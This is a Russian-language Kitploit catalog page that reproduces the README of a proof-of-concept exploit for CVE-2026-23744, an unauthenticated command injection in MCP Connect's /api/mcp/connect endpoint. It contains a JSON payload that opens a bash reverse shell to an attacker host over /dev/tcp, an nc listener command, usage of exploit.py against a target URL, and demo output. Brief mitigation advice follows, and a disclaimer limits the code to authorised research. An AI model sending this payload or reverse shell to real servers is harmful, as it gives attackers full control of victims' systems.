Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23744 — Эксплойт-доказательство концепции для CVE-2026-23744 — неаутентифицированная инъекция команд в MCP Connect, приводящая к удалённому выполнению кода и обратной оболочке. | Kitploit
Инструменты/GitHubGitHub/cylock11/cve-2026-23744
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubcylock11/cve-2026-23744

CVE-2026-23744

Эксплойт-доказательство концепции для CVE-2026-23744 — неаутентифицированная инъекция команд в MCP Connect, приводящая к удалённому выполнению кода и обратной оболочке.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-23744 — MCP Connect RCE через неаутентифицированную инъекцию команд

Python Category Type License

⚠️ Отказ от ответственности: Этот репозиторий предназначен исключительно для образовательных целей и исследований в области безопасности. Использование этого эксплойта против систем без явного разрешения незаконно. Автор не несёт ответственности за неправомерное использование этого кода.


📌 Описание уязвимости

Уязвимость находится в конечной точке /api/mcp/connect, которая позволяет неаутентифицированному атакующему зарегистрировать произвольный MCP-сервер (Model Context Protocol) с вредоносной конфигурацией. Из-за отсутствия проверки и санитизации поля command и его args возможна инъекция команд операционной системы, которые выполняются непосредственно на сервере с привилегиями веб-процесса.

Это приводит к удалённому выполнению кода (RCE), которое можно использовать для получения reverse shell на скомпрометированной системе.


🧠 Технические детали

ПолеДетали
ТипУдалённое выполнение кода (RCE)
ВекторСеть (HTTP POST без аутентификации)
Конечная точка/api/mcp/connect
Критичность🔴 Критическая
АутентификацияНе требуется
ВоздействиеПолный контроль над сервером

Вредоносная нагрузка

root@kitploit:~
{
  "serverId": "shell1",
  "serverConfig": {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
    "env": {}
  }
}

Сервер обрабатывает эту конфигурацию и вызывает команду bash с предоставленными аргументами, устанавливая обратное TCP-соединение с атакующим.


🛠️ Требования

  • Python 3.x
  • Следующие библиотеки:
root@kitploit:~
pip install requests termcolor

🚀 Использование

root@kitploit:~
python3 exploit.py -l <ТВОЙ_IP> -u <URL_ЦЕЛИ>

Параметры

ПараметрОписаниеПример
-lТвой IP (куда получишь shell)192.168.1.50
-uБазовый URL целиhttps://victim.com

Полный пример

Терминал 1 — Listener:

root@kitploit:~
nc -nlvp 443

Терминал 2 — Эксплойт:

root@kitploit:~
python3 exploit.py -l 192.168.1.50 -u https://victim.com

🎬 Демонстрация

root@kitploit:~
[-] Please, execute the following command in another terminal:

[+] nc -nlvp 443

[-] Press 'Enter' when the command has been executed...

[+] Sending attack request...

После отправки запроса listener на порту 443 получит обратное соединение с интерактивной shell скомпрометированного сервера.


🛡️ Меры по смягчению

  • Проверять и санитизировать все поля body в /api/mcp/connect перед их обработкой.
  • Аутентифицировать конечную точку и ограничить доступ только для пользователей с привилегиями.
  • Никогда не выполнять системные команды напрямую на основе пользовательского ввода.
  • Внедрить белый список разрешённых команд.
  • Применять принцип минимальных привилегий к процессу веб-сервера.

📁 Структура репозитория

root@kitploit:~
.
├── exploit.py       # Основной скрипт эксплойта
└── README.md        # Этот файл

👤 Автор

Разработано в исследовательских целях в области наступательной безопасности Jorge Arana Fedriani.

Скачать инструмент